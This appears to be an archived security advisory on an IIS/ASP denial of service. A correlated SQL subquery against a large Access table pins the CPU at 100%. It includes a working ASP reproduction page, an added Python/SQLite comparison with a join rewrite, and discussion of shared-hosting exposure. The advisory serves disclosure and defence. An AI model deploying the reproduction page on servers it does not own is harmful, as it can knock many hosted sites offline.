COMMAND

    IIS

SYSTEMS AFFECTED

    IIS

PROBLEM

    Jair Pedro found the following.  A specific SQL statement works
    fine under MS-Office, but in an ASP page it causes the CPU usage
    to climb until it reaches 100%, and the only alternative is to
    turn off the machine.

    This has been tested on 4 different machines (K6-2/400 MHz
    128MB/PII-500 MHz 256MB) running the following systems:

        - 2 machines were running Win2K Pro/IIS5 SP1-Portuguese version
        - 1 machine was running Win2k Server/IIS5 SP1 -Portuguese Version
        - 1 machine was running WinNt4 Server/SP5 - Portuguese Version

    Below is a sample ASP page to reproduce the problem:

    <%
    'TestBufferOverFlow.Asp

    'DbExample is a database with only one table, named "Tabela2"
    '"Tabela2" is a table with about 120.000 records
    'sqlSearch is an SQL string which works fine if it is run in MS Access 2000;
    'It also works fine if I clean up the table, leaving few records,
    'but in an ASP page it causes the CPU usage to hit (and stay at) 100%
    'Please advise if you want me to send the complete structure of Table2

    Dim Conn, rs, sqlSearch, strConex
    Set Conn=CreateObject("Adodb.Connection")
    Set rs=CreateObject("AdoDb.Recordset")
    'Open the Access database through the ODBC driver
    strConex="DBQ=c:\inetpub\Database\DbExample.mdb;" & _
        "Driver={Microsoft Access Driver (*.mdb)}"
    Conn.Open strConex,"",""
    'Build the query: the inner SELECT refers back to the outer row's endereco
    sqlSearch="SELECT * FROM Tabela2 "
    sqlSearch=sqlSearch & "WHERE (((Tabela2.unidade) In (SELECT [unidade] FROM " & _
        "[Tabela2] As Tmp GROUP BY [unidade],[endereco] HAVING Count(*)>1  And " & _
        "[endereco] = [Tabela2].[endereco]))) "
    sqlSearch=sqlSearch & "ORDER BY Tabela2.unidade, Tabela2.endereco;"
    Response.Write "Next instruction will crash IIS"
    rs.Open sqlSearch, Conn
    Response.Write "This line will never be reached"
    rs.Close
    Conn.Close
    set rs=nothing
    set conn=nothing
    %>
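
    An added example (not part of the original advisory): the query
    above selects every row whose (unidade, endereco) pair occurs more
    than once, and this Python/SQLite sketch checks on constructed rows
    that a join against a single grouped pass returns the same rows.
    SQLite stands in for the Access driver, the id column and sample
    data are assumptions, and the advisory does not establish that
    this rewrite avoids the IIS hang.

```python
import sqlite3

# The advisory's query, verbatim: the inner SELECT is correlated with the
# outer row through [Tabela2].[endereco], so it depends on every outer row.
CORRELATED = (
    "SELECT * FROM Tabela2 "
    "WHERE (((Tabela2.unidade) In (SELECT [unidade] FROM [Tabela2] As Tmp "
    "GROUP BY [unidade],[endereco] HAVING Count(*)>1 And "
    "[endereco] = [Tabela2].[endereco]))) "
    "ORDER BY Tabela2.unidade, Tabela2.endereco;"
)

# Added rewrite (not from the advisory): group the table once, then join.
JOINED = (
    "SELECT t.* FROM Tabela2 AS t "
    "JOIN (SELECT unidade, endereco FROM Tabela2 "
    "      GROUP BY unidade, endereco HAVING COUNT(*) > 1) AS d "
    "  ON d.unidade = t.unidade AND d.endereco = t.endereco "
    "ORDER BY t.unidade, t.endereco;"
)

# Constructed sample rows (id, unidade, endereco); the advisory gives only
# the two column names, so the id column and all values are assumptions.
SAMPLE_ROWS = [
    (1, "A1", "Rua X 10"), (2, "A1", "Rua X 10"),   # duplicate pair
    (3, "A1", "Rua Y 20"),                          # same unit, other address
    (4, "B2", "Rua X 10"),                          # same address, other unit
    (5, "C3", "Rua Z 30"), (6, "C3", "Rua Z 30"), (7, "C3", "Rua Z 30"),
    (8, None, "Rua W 40"), (9, None, "Rua W 40"),   # NULL unit never matches
]

def build_db(rows=SAMPLE_ROWS):
    """Create an in-memory Tabela2 holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Tabela2 (id INTEGER PRIMARY KEY, unidade TEXT, endereco TEXT)")
    conn.executemany("INSERT INTO Tabela2 VALUES (?, ?, ?)", rows)
    return conn

def duplicate_ids(conn, sql):
    """Return the sorted ids of the rows a query selects."""
    return sorted(row[0] for row in conn.execute(sql))

if __name__ == "__main__":
    db = build_db()
    print("correlated:", duplicate_ids(db, CORRELATED))
    print("joined:    ", duplicate_ids(db, JOINED))
```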

SOLUTION

    In order for this ASP code to execute, it must reside on the local
    webserver in question.  If  the malicious user had the  ability to
    upload  code  to  the  webserver,  "unpleasant things can happen".
    Allowing  untrusted  users  to  upload  code  to  a  webserver  is
    discussed in Rule #4 from the Ten Immutable Laws of Security:

        http://www.microsoft.com/technet/security/10imlaws.asp#d

    HOWEVER, what are web hosting companies supposed to do about a
    person who pays 20 bucks to get an account, uploads a file and
    takes down the X number of other people hosted on that same
    server?  Or maybe someone does not go and buy an account...
    instead one domain on a server with X number of domains is
    incorrectly set up to allow file uploads via a poorly written ASP
    script that allows people to upload to that insecure domain...
    now, because we have no local security, all of those domains are
    screwed.  We all know that in a Unix environment (if things are
    set up correctly) someone getting access to one domain does not
    have to mean the end of the world for the rest of the domains in
    a multi-homed environment.

    An IIS server should not so easily fall over if someone gets the
    ability to execute as IUSR_MACHINE....  Look at Apache... just
    because someone breaks in via Apache (running as "nobody") that
    does not have to lead to the entire system being compromised or
    taken offline.